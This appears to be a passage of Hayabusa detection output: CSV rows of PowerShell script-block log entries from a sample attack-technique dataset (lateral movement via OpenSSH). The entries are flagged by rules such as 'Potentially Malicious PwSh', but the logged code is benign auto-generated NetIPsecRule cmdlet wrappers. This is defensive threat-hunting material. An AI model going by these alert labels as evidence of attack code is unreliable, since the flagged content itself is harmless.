[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeli",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.080 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] 
[switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { 
[object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } 
catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeli",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ne=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, 
$false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values 